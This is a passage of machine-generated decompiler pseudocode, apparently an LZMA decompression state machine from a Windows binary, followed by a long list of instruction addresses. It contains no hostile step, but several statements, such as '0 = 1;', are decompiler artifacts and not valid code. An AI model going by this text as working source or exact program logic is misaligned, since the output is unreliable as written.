                                                                                    												 *(__ebp - 0x40) = 8;
                                                                                    												L144:
                                                                                    												 *(__ebp - 0x7c) = 0x14;
                                                                                    												goto L145;
                                                                                    											}
                                                                                    											__eax =  *(__ebp - 0x4c);
                                                                                    											__ecx =  *(__ebp - 0x58);
                                                                                    											__eax =  *(__ebp - 0x4c) << 4;
                                                                                    											 *(__ebp - 0x30) = 8;
                                                                                    											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                                                    											L130:
                                                                                    											 *(__ebp - 0x58) = __eax;
                                                                                    											 *(__ebp - 0x40) = 3;
                                                                                    											goto L144;
                                                                                    										case 0x14:
                                                                                    											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                                                    											__eax =  *(__ebp - 0x80);
                                                                                    											 *(_t613 - 0x88) = _t533;
                                                                                    											goto L1;
                                                                                    										case 0x15:
                                                                                    											__eax = 0;
                                                                                    											__eflags =  *(__ebp - 0x38) - 7;
                                                                                    											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                                    											__al = __al & 0x000000fd;
                                                                                    											__eax = (__eflags >= 0) - 1 + 0xb;
                                                                                    											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                                                    											goto L120;
                                                                                    										case 0x16:
                                                                                    											__eax =  *(__ebp - 0x30);
                                                                                    											__eflags = __eax - 4;
                                                                                    											if(__eax >= 4) {
                                                                                    												_push(3);
                                                                                    												_pop(__eax);
                                                                                    											}
                                                                                    											__ecx =  *(__ebp - 4);
                                                                                    											 *(__ebp - 0x40) = 6;
                                                                                    											__eax = __eax << 7;
                                                                                    											 *(__ebp - 0x7c) = 0x19;
                                                                                    											 *(__ebp - 0x58) = __eax;
                                                                                    											goto L145;
                                                                                    										case 0x17:
                                                                                    											L145:
                                                                                    											__eax =  *(__ebp - 0x40);
                                                                                    											 *(__ebp - 0x50) = 1;
                                                                                    											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                                                    											goto L149;
                                                                                    										case 0x18:
                                                                                    											L146:
                                                                                    											__eflags =  *(__ebp - 0x6c);
                                                                                    											if( *(__ebp - 0x6c) == 0) {
                                                                                    												 *(__ebp - 0x88) = 0x18;
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											__ecx =  *(__ebp - 0x70);
                                                                                    											__eax =  *(__ebp - 0xc);
                                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                                    											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                                    											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											_t484 = __ebp - 0x70;
                                                                                    											 *_t484 =  *(__ebp - 0x70) + 1;
                                                                                    											__eflags =  *_t484;
                                                                                    											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                                    											L148:
                                                                                    											_t487 = __ebp - 0x48;
                                                                                    											 *_t487 =  *(__ebp - 0x48) - 1;
                                                                                    											__eflags =  *_t487;
                                                                                    											L149:
                                                                                    											__eflags =  *(__ebp - 0x48);
                                                                                    											if( *(__ebp - 0x48) <= 0) {
                                                                                    												__ecx =  *(__ebp - 0x40);
                                                                                    												__ebx =  *(__ebp - 0x50);
                                                                                    												0 = 1;
                                                                                    												__eax = 1 << __cl;
                                                                                    												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                                                    												__eax =  *(__ebp - 0x7c);
                                                                                    												 *(__ebp - 0x44) = __ebx;
                                                                                    												while(1) {
                                                                                    													 *(_t613 - 0x88) = _t533;
                                                                                    													goto L1;
                                                                                    												}
                                                                                    											}
                                                                                    											__eax =  *(__ebp - 0x50);
                                                                                    											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                    											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                    											__eax =  *(__ebp - 0x58);
                                                                                    											__esi = __edx + __eax;
                                                                                    											 *(__ebp - 0x54) = __esi;
                                                                                    											__ax =  *__esi;
                                                                                    											__edi = __ax & 0x0000ffff;
                                                                                    											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                                    											__eflags =  *(__ebp - 0xc) - __ecx;
                                                                                    											if( *(__ebp - 0xc) >= __ecx) {
                                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                                    												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                                    												__cx = __ax;
                                                                                    												__cx = __ax >> 5;
                                                                                    												__eax = __eax - __ecx;
                                                                                    												__edx = __edx + 1;
                                                                                    												__eflags = __edx;
                                                                                    												 *__esi = __ax;
                                                                                    												 *(__ebp - 0x50) = __edx;
                                                                                    											} else {
                                                                                    												 *(__ebp - 0x10) = __ecx;
                                                                                    												0x800 = 0x800 - __edi;
                                                                                    												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                                    												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                    												 *__esi = __cx;
                                                                                    											}
                                                                                    											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    											if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    												goto L148;
                                                                                    											} else {
                                                                                    												goto L146;
                                                                                    											}
                                                                                    										case 0x19:
                                                                                    											__eflags = __ebx - 4;
                                                                                    											if(__ebx < 4) {
                                                                                    												 *(__ebp - 0x2c) = __ebx;
                                                                                    												L119:
                                                                                    												_t393 = __ebp - 0x2c;
                                                                                    												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                                                    												__eflags =  *_t393;
                                                                                    												L120:
                                                                                    												__eax =  *(__ebp - 0x2c);
                                                                                    												__eflags = __eax;
                                                                                    												if(__eax == 0) {
                                                                                    													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                                                    													goto L170;
                                                                                    												}
                                                                                    												__eflags = __eax -  *(__ebp - 0x60);
                                                                                    												if(__eax >  *(__ebp - 0x60)) {
                                                                                    													goto L171;
                                                                                    												}
                                                                                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                                                    												__eax =  *(__ebp - 0x30);
                                                                                    												_t400 = __ebp - 0x60;
                                                                                    												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                                                    												__eflags =  *_t400;
                                                                                    												goto L123;
                                                                                    											}
                                                                                    											__ecx = __ebx;
                                                                                    											__eax = __ebx;
                                                                                    											__ecx = __ebx >> 1;
                                                                                    											__eax = __ebx & 0x00000001;
                                                                                    											__ecx = (__ebx >> 1) - 1;
                                                                                    											__al = __al | 0x00000002;
                                                                                    											__eax = (__ebx & 0x00000001) << __cl;
                                                                                    											__eflags = __ebx - 0xe;
                                                                                    											 *(__ebp - 0x2c) = __eax;
                                                                                    											if(__ebx >= 0xe) {
                                                                                    												__ebx = 0;
                                                                                    												 *(__ebp - 0x48) = __ecx;
                                                                                    												L102:
                                                                                    												__eflags =  *(__ebp - 0x48);
                                                                                    												if( *(__ebp - 0x48) <= 0) {
                                                                                    													__eax = __eax + __ebx;
                                                                                    													 *(__ebp - 0x40) = 4;
                                                                                    													 *(__ebp - 0x2c) = __eax;
                                                                                    													__eax =  *(__ebp - 4);
                                                                                    													__eax =  *(__ebp - 4) + 0x644;
                                                                                    													__eflags = __eax;
                                                                                    													L108:
                                                                                    													__ebx = 0;
                                                                                    													 *(__ebp - 0x58) = __eax;
                                                                                    													 *(__ebp - 0x50) = 1;
                                                                                    													 *(__ebp - 0x44) = 0;
                                                                                    													 *(__ebp - 0x48) = 0;
                                                                                    													L112:
                                                                                    													__eax =  *(__ebp - 0x40);
                                                                                    													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                                    													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                                                    														_t391 = __ebp - 0x2c;
                                                                                    														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                                                    														__eflags =  *_t391;
                                                                                    														goto L119;
                                                                                    													}
                                                                                    													__eax =  *(__ebp - 0x50);
                                                                                    													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                                    													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                                                    													__eax =  *(__ebp - 0x58);
                                                                                    													__esi = __edi + __eax;
                                                                                    													 *(__ebp - 0x54) = __esi;
                                                                                    													__ax =  *__esi;
                                                                                    													__ecx = __ax & 0x0000ffff;
                                                                                    													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                                                    													__eflags =  *(__ebp - 0xc) - __edx;
                                                                                    													if( *(__ebp - 0xc) >= __edx) {
                                                                                    														__ecx = 0;
                                                                                    														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                                                    														__ecx = 1;
                                                                                    														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                                                    														__ebx = 1;
                                                                                    														__ecx =  *(__ebp - 0x48);
                                                                                    														__ebx = 1 << __cl;
                                                                                    														__ecx = 1 << __cl;
                                                                                    														__ebx =  *(__ebp - 0x44);
                                                                                    														__ebx =  *(__ebp - 0x44) | __ecx;
                                                                                    														__cx = __ax;
                                                                                    														__cx = __ax >> 5;
                                                                                    														__eax = __eax - __ecx;
                                                                                    														__edi = __edi + 1;
                                                                                    														__eflags = __edi;
                                                                                    														 *(__ebp - 0x44) = __ebx;
                                                                                    														 *__esi = __ax;
                                                                                    														 *(__ebp - 0x50) = __edi;
                                                                                    													} else {
                                                                                    														 *(__ebp - 0x10) = __edx;
                                                                                    														0x800 = 0x800 - __ecx;
                                                                                    														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                                                    														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                                                    														 *__esi = __dx;
                                                                                    													}
                                                                                    													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    													if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    														L111:
                                                                                    														_t368 = __ebp - 0x48;
                                                                                    														 *_t368 =  *(__ebp - 0x48) + 1;
                                                                                    														__eflags =  *_t368;
                                                                                    														goto L112;
                                                                                    													} else {
                                                                                    														goto L109;
                                                                                    													}
                                                                                    												}
                                                                                    												__ecx =  *(__ebp - 0xc);
                                                                                    												__ebx = __ebx + __ebx;
                                                                                    												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                                                    												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                    												 *(__ebp - 0x44) = __ebx;
                                                                                    												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                                                    													__ecx =  *(__ebp - 0x10);
                                                                                    													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                                                    													__ebx = __ebx | 0x00000001;
                                                                                    													__eflags = __ebx;
                                                                                    													 *(__ebp - 0x44) = __ebx;
                                                                                    												}
                                                                                    												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                                    												if( *(__ebp - 0x10) >= 0x1000000) {
                                                                                    													L101:
                                                                                    													_t338 = __ebp - 0x48;
                                                                                    													 *_t338 =  *(__ebp - 0x48) - 1;
                                                                                    													__eflags =  *_t338;
                                                                                    													goto L102;
                                                                                    												} else {
                                                                                    													goto L99;
                                                                                    												}
                                                                                    											}
                                                                                    											__edx =  *(__ebp - 4);
                                                                                    											__eax = __eax - __ebx;
                                                                                    											 *(__ebp - 0x40) = __ecx;
                                                                                    											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                                                    											goto L108;
                                                                                    										case 0x1a:
                                                                                    											L56:
                                                                                    											__eflags =  *(__ebp - 0x64);
                                                                                    											if( *(__ebp - 0x64) == 0) {
                                                                                    												 *(__ebp - 0x88) = 0x1a;
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											__ecx =  *(__ebp - 0x68);
                                                                                    											__al =  *(__ebp - 0x5c);
                                                                                    											__edx =  *(__ebp - 8);
                                                                                    											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                    											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                    											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                    											 *( *(__ebp - 0x68)) = __al;
                                                                                    											__ecx =  *(__ebp - 0x14);
                                                                                    											 *(__ecx +  *(__ebp - 8)) = __al;
                                                                                    											__eax = __ecx + 1;
                                                                                    											__edx = 0;
                                                                                    											_t192 = __eax %  *(__ebp - 0x74);
                                                                                    											__eax = __eax /  *(__ebp - 0x74);
                                                                                    											__edx = _t192;
                                                                                    											goto L79;
                                                                                    										case 0x1b:
                                                                                    											L75:
                                                                                    											__eflags =  *(__ebp - 0x64);
                                                                                    											if( *(__ebp - 0x64) == 0) {
                                                                                    												 *(__ebp - 0x88) = 0x1b;
                                                                                    												goto L170;
                                                                                    											}
                                                                                    											__eax =  *(__ebp - 0x14);
                                                                                    											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                    											__eflags = __eax -  *(__ebp - 0x74);
                                                                                    											if(__eax >=  *(__ebp - 0x74)) {
                                                                                    												__eax = __eax +  *(__ebp - 0x74);
                                                                                    												__eflags = __eax;
                                                                                    											}
                                                                                    											__edx =  *(__ebp - 8);
                                                                                    											__cl =  *(__eax + __edx);
                                                                                    											__eax =  *(__ebp - 0x14);
                                                                                    											 *(__ebp - 0x5c) = __cl;
                                                                                    											 *(__eax + __edx) = __cl;
                                                                                    											__eax = __eax + 1;
                                                                                    											__edx = 0;
                                                                                    											_t274 = __eax %  *(__ebp - 0x74);
                                                                                    											__eax = __eax /  *(__ebp - 0x74);
                                                                                    											__edx = _t274;
                                                                                    											__eax =  *(__ebp - 0x68);
                                                                                    											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                                    											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                    											_t283 = __ebp - 0x64;
                                                                                    											 *_t283 =  *(__ebp - 0x64) - 1;
                                                                                    											__eflags =  *_t283;
                                                                                    											 *( *(__ebp - 0x68)) = __cl;
                                                                                    											L79:
                                                                                    											 *(__ebp - 0x14) = __edx;
                                                                                    											goto L80;
                                                                                    										case 0x1c:
                                                                                    											while(1) {
                                                                                    												L123:
                                                                                    												__eflags =  *(__ebp - 0x64);
                                                                                    												if( *(__ebp - 0x64) == 0) {
                                                                                    													break;
                                                                                    												}
                                                                                    												__eax =  *(__ebp - 0x14);
                                                                                    												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                                    												__eflags = __eax -  *(__ebp - 0x74);
                                                                                    												if(__eax >=  *(__ebp - 0x74)) {
                                                                                    													__eax = __eax +  *(__ebp - 0x74);
                                                                                    													__eflags = __eax;
                                                                                    												}
                                                                                    												__edx =  *(__ebp - 8);
                                                                                    												__cl =  *(__eax + __edx);
                                                                                    												__eax =  *(__ebp - 0x14);
                                                                                    												 *(__ebp - 0x5c) = __cl;
                                                                                    												 *(__eax + __edx) = __cl;
                                                                                    												__eax = __eax + 1;
                                                                                    												__edx = 0;
                                                                                    												_t414 = __eax %  *(__ebp - 0x74);
                                                                                    												__eax = __eax /  *(__ebp - 0x74);
                                                                                    												__edx = _t414;
                                                                                    												__eax =  *(__ebp - 0x68);
                                                                                    												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                                    												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                                                    												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                                                    												__eflags =  *(__ebp - 0x30);
                                                                                    												 *( *(__ebp - 0x68)) = __cl;
                                                                                    												 *(__ebp - 0x14) = _t414;
                                                                                    												if( *(__ebp - 0x30) > 0) {
                                                                                    													continue;
                                                                                    												} else {
                                                                                    													L80:
                                                                                    													 *(__ebp - 0x88) = 2;
                                                                                    													goto L1;
                                                                                    												}
                                                                                    											}
                                                                                    											 *(__ebp - 0x88) = 0x1c;
                                                                                    											goto L170;
                                                                                    									}
                                                                                    								}
                                                                                    								L171:
                                                                                    								_t535 = _t534 | 0xffffffff;
                                                                                    								goto L172;
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    				}
                                                                                    			}













                                                                                    0x00000000
                                                                                    0x00407068
                                                                                    0x00407068
                                                                                    0x0040706c
                                                                                    0x00407095
                                                                                    0x0040709f
                                                                                    0x0040706e
                                                                                    0x00407077
                                                                                    0x00407084
                                                                                    0x00407087
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x004073ce
                                                                                    0x004073ce
                                                                                    0x004073ce
                                                                                    0x004073d4
                                                                                    0x004073da
                                                                                    0x004073e0
                                                                                    0x004073fa
                                                                                    0x004073fd
                                                                                    0x00407403
                                                                                    0x0040740e
                                                                                    0x00407410
                                                                                    0x004073e2
                                                                                    0x004073e2
                                                                                    0x004073f1
                                                                                    0x004073f5
                                                                                    0x004073f5
                                                                                    0x0040741a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040741c
                                                                                    0x00407420
                                                                                    0x004075cf
                                                                                    0x004075e5
                                                                                    0x004075ed
                                                                                    0x004075f4
                                                                                    0x004075f6
                                                                                    0x004075fd
                                                                                    0x00407601
                                                                                    0x00407601
                                                                                    0x0040742c
                                                                                    0x00407433
                                                                                    0x0040743b
                                                                                    0x0040743e
                                                                                    0x00407441
                                                                                    0x00407441
                                                                                    0x00407447
                                                                                    0x00407447
                                                                                    0x00406be3
                                                                                    0x00406be3
                                                                                    0x00406be3
                                                                                    0x00406bec
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406bf2
                                                                                    0x00000000
                                                                                    0x00406bfd
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c06
                                                                                    0x00406c09
                                                                                    0x00406c0c
                                                                                    0x00406c10
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c16
                                                                                    0x00406c19
                                                                                    0x00406c1b
                                                                                    0x00406c1c
                                                                                    0x00406c1f
                                                                                    0x00406c21
                                                                                    0x00406c22
                                                                                    0x00406c24
                                                                                    0x00406c27
                                                                                    0x00406c2c
                                                                                    0x00406c31
                                                                                    0x00406c3a
                                                                                    0x00406c4d
                                                                                    0x00406c50
                                                                                    0x00406c5c
                                                                                    0x00406c84
                                                                                    0x00406c86
                                                                                    0x00406c94
                                                                                    0x00406c94
                                                                                    0x00406c98
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406c88
                                                                                    0x00406c88
                                                                                    0x00406c8b
                                                                                    0x00406c8c
                                                                                    0x00406c8c
                                                                                    0x00000000
                                                                                    0x00406c88
                                                                                    0x00406c62
                                                                                    0x00406c67
                                                                                    0x00406c67
                                                                                    0x00406c70
                                                                                    0x00406c78
                                                                                    0x00406c7b
                                                                                    0x00000000
                                                                                    0x00406c81
                                                                                    0x00406c81
                                                                                    0x00000000
                                                                                    0x00406c81
                                                                                    0x00000000
                                                                                    0x00406c9e
                                                                                    0x00406c9e
                                                                                    0x00406ca2
                                                                                    0x0040754e
                                                                                    0x00000000
                                                                                    0x0040754e
                                                                                    0x00406cab
                                                                                    0x00406cbb
                                                                                    0x00406cbe
                                                                                    0x00406cc1
                                                                                    0x00406cc1
                                                                                    0x00406cc1
                                                                                    0x00406cc4
                                                                                    0x00406cc8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406cca
                                                                                    0x00406cd0
                                                                                    0x00406cfa
                                                                                    0x00406d00
                                                                                    0x00406d07
                                                                                    0x00000000
                                                                                    0x00406d07
                                                                                    0x00406cd6
                                                                                    0x00406cd9
                                                                                    0x00406cde
                                                                                    0x00406cde
                                                                                    0x00406ce9
                                                                                    0x00406cf1
                                                                                    0x00406cf4
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d39
                                                                                    0x00406d3f
                                                                                    0x00406d42
                                                                                    0x00406d4f
                                                                                    0x00406d57
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d0e
                                                                                    0x00406d0e
                                                                                    0x00406d12
                                                                                    0x0040755d
                                                                                    0x00000000
                                                                                    0x0040755d
                                                                                    0x00406d1e
                                                                                    0x00406d29
                                                                                    0x00406d29
                                                                                    0x00406d29
                                                                                    0x00406d2c
                                                                                    0x00406d2f
                                                                                    0x00406d32
                                                                                    0x00406d37
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004073ce
                                                                                    0x004073ce
                                                                                    0x004073d4
                                                                                    0x004073da
                                                                                    0x004073e0
                                                                                    0x004073fa
                                                                                    0x004073fd
                                                                                    0x00407403
                                                                                    0x0040740e
                                                                                    0x00407410
                                                                                    0x004073e2
                                                                                    0x004073e2
                                                                                    0x004073f1
                                                                                    0x004073f5
                                                                                    0x004073f5
                                                                                    0x0040741a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406d5f
                                                                                    0x00406d61
                                                                                    0x00406d64
                                                                                    0x00406dd5
                                                                                    0x00406dd8
                                                                                    0x00406ddb
                                                                                    0x00406de2
                                                                                    0x00406dec
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00406d66
                                                                                    0x00406d6a
                                                                                    0x00406d6d
                                                                                    0x00406d6f
                                                                                    0x00406d72
                                                                                    0x00406d75
                                                                                    0x00406d77
                                                                                    0x00406d7a
                                                                                    0x00406d7c
                                                                                    0x00406d81
                                                                                    0x00406d84
                                                                                    0x00406d87
                                                                                    0x00406d8b
                                                                                    0x00406d92
                                                                                    0x00406d95
                                                                                    0x00406d9c
                                                                                    0x00406da0
                                                                                    0x00406da8
                                                                                    0x00406da8
                                                                                    0x00406da8
                                                                                    0x00406da2
                                                                                    0x00406da2
                                                                                    0x00406da2
                                                                                    0x00406d97
                                                                                    0x00406d97
                                                                                    0x00406d97
                                                                                    0x00406dac
                                                                                    0x00406daf
                                                                                    0x00406dcd
                                                                                    0x00406dcf
                                                                                    0x00000000
                                                                                    0x00406db1
                                                                                    0x00406db1
                                                                                    0x00406db4
                                                                                    0x00406db7
                                                                                    0x00406dba
                                                                                    0x00406dbc
                                                                                    0x00406dbc
                                                                                    0x00406dbc
                                                                                    0x00406dbf
                                                                                    0x00406dc2
                                                                                    0x00406dc4
                                                                                    0x00406dc5
                                                                                    0x00406dc8
                                                                                    0x00000000
                                                                                    0x00406dc8
                                                                                    0x00000000
                                                                                    0x00406ffe
                                                                                    0x00407002
                                                                                    0x00407020
                                                                                    0x00407023
                                                                                    0x0040702a
                                                                                    0x0040702d
                                                                                    0x00407030
                                                                                    0x00407033
                                                                                    0x00407036
                                                                                    0x00407039
                                                                                    0x0040703b
                                                                                    0x00407042
                                                                                    0x00407043
                                                                                    0x00407045
                                                                                    0x00407048
                                                                                    0x0040704b
                                                                                    0x0040704e
                                                                                    0x0040704e
                                                                                    0x00407053
                                                                                    0x00000000
                                                                                    0x00407053
                                                                                    0x00407004
                                                                                    0x00407007
                                                                                    0x0040700a
                                                                                    0x00407014
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070ab
                                                                                    0x004070af
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070b5
                                                                                    0x004070b9
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004070bf
                                                                                    0x004070c1
                                                                                    0x004070c5
                                                                                    0x004070c5
                                                                                    0x004070c8
                                                                                    0x004070cc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040711c
                                                                                    0x00407120
                                                                                    0x00407127
                                                                                    0x0040712a
                                                                                    0x0040712d
                                                                                    0x00407137
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00000000
                                                                                    0x004073cb
                                                                                    0x004073cb
                                                                                    0x00407122
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407143
                                                                                    0x00407147
                                                                                    0x0040714e
                                                                                    0x00407151
                                                                                    0x00407154
                                                                                    0x00407149
                                                                                    0x00407149
                                                                                    0x00407149
                                                                                    0x00407157
                                                                                    0x0040715a
                                                                                    0x0040715d
                                                                                    0x0040715d
                                                                                    0x00407160
                                                                                    0x00407163
                                                                                    0x00407166
                                                                                    0x00407166
                                                                                    0x00407169
                                                                                    0x00407170
                                                                                    0x00407175
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00407203
                                                                                    0x00407203
                                                                                    0x00407207
                                                                                    0x004075a5
                                                                                    0x00000000
                                                                                    0x004075a5
                                                                                    0x0040720d
                                                                                    0x00407210
                                                                                    0x00407213
                                                                                    0x00407217
                                                                                    0x0040721a
                                                                                    0x00407220
                                                                                    0x00407222
                                                                                    0x00407222
                                                                                    0x00407222
                                                                                    0x00407225
                                                                                    0x00407228
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406df8
                                                                                    0x00406df8
                                                                                    0x00406dfc
                                                                                    0x00407569
                                                                                    0x00000000
                                                                                    0x00407569
                                                                                    0x00406e02
                                                                                    0x00406e05
                                                                                    0x00406e08
                                                                                    0x00406e0c
                                                                                    0x00406e0f
                                                                                    0x00406e15
                                                                                    0x00406e17
                                                                                    0x00406e17
                                                                                    0x00406e17
                                                                                    0x00406e1a
                                                                                    0x00406e1d
                                                                                    0x00406e1d
                                                                                    0x00406e20
                                                                                    0x00406e23
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e29
                                                                                    0x00406e2f
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406e35
                                                                                    0x00406e35
                                                                                    0x00406e39
                                                                                    0x00406e3c
                                                                                    0x00406e3f
                                                                                    0x00406e42
                                                                                    0x00406e45
                                                                                    0x00406e46
                                                                                    0x00406e49
                                                                                    0x00406e4b
                                                                                    0x00406e51
                                                                                    0x00406e54
                                                                                    0x00406e57
                                                                                    0x00406e5a
                                                                                    0x00406e5d
                                                                                    0x00406e60
                                                                                    0x00406e63
                                                                                    0x00406e7f
                                                                                    0x00406e82
                                                                                    0x00406e85
                                                                                    0x00406e88
                                                                                    0x00406e8f
                                                                                    0x00406e93
                                                                                    0x00406e95
                                                                                    0x00406e99
                                                                                    0x00406e65
                                                                                    0x00406e65
                                                                                    0x00406e69
                                                                                    0x00406e71
                                                                                    0x00406e76
                                                                                    0x00406e78
                                                                                    0x00406e7a
                                                                                    0x00406e7a
                                                                                    0x00406e9c
                                                                                    0x00406ea3
                                                                                    0x00406ea6
                                                                                    0x00000000
                                                                                    0x00406eac
                                                                                    0x00000000
                                                                                    0x00406eac
                                                                                    0x00000000
                                                                                    0x00406eb1
                                                                                    0x00406eb1
                                                                                    0x00406eb5
                                                                                    0x00407575
                                                                                    0x00000000
                                                                                    0x00407575
                                                                                    0x00406ebb
                                                                                    0x00406ebe
                                                                                    0x00406ec1
                                                                                    0x00406ec5
                                                                                    0x00406ec8
                                                                                    0x00406ece
                                                                                    0x00406ed0
                                                                                    0x00406ed0
                                                                                    0x00406ed0
                                                                                    0x00406ed3
                                                                                    0x00406ed6
                                                                                    0x00406ed6
                                                                                    0x00406ed6
                                                                                    0x00406edc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406ede
                                                                                    0x00406ee1
                                                                                    0x00406ee4
                                                                                    0x00406ee7
                                                                                    0x00406eea
                                                                                    0x00406eed
                                                                                    0x00406ef0
                                                                                    0x00406ef3
                                                                                    0x00406ef6
                                                                                    0x00406ef9
                                                                                    0x00406efc
                                                                                    0x00406f14
                                                                                    0x00406f17
                                                                                    0x00406f1a
                                                                                    0x00406f1d
                                                                                    0x00406f1d
                                                                                    0x00406f20
                                                                                    0x00406f24
                                                                                    0x00406f26
                                                                                    0x00406efe
                                                                                    0x00406efe
                                                                                    0x00406f06
                                                                                    0x00406f0b
                                                                                    0x00406f0d
                                                                                    0x00406f0f
                                                                                    0x00406f0f
                                                                                    0x00406f29
                                                                                    0x00406f30
                                                                                    0x00406f33
                                                                                    0x00000000
                                                                                    0x00406f35
                                                                                    0x00000000
                                                                                    0x00406f35
                                                                                    0x00406f33
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00406f3a
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00406f75
                                                                                    0x00406f75
                                                                                    0x00406f79
                                                                                    0x00407581
                                                                                    0x00000000
                                                                                    0x00407581
                                                                                    0x00406f7f
                                                                                    0x00406f82
                                                                                    0x00406f85
                                                                                    0x00406f89
                                                                                    0x00406f8c
                                                                                    0x00406f92
                                                                                    0x00406f94
                                                                                    0x00406f94
                                                                                    0x00406f94
                                                                                    0x00406f97
                                                                                    0x00406f9a
                                                                                    0x00406f9a
                                                                                    0x00406fa0
                                                                                    0x00406f3e
                                                                                    0x00406f3e
                                                                                    0x00406f41
                                                                                    0x00000000
                                                                                    0x00406f41
                                                                                    0x00406fa2
                                                                                    0x00406fa2
                                                                                    0x00406fa5
                                                                                    0x00406fa8
                                                                                    0x00406fab
                                                                                    0x00406fae
                                                                                    0x00406fb1
                                                                                    0x00406fb4
                                                                                    0x00406fb7
                                                                                    0x00406fba
                                                                                    0x00406fbd
                                                                                    0x00406fc0
                                                                                    0x00406fd8
                                                                                    0x00406fdb
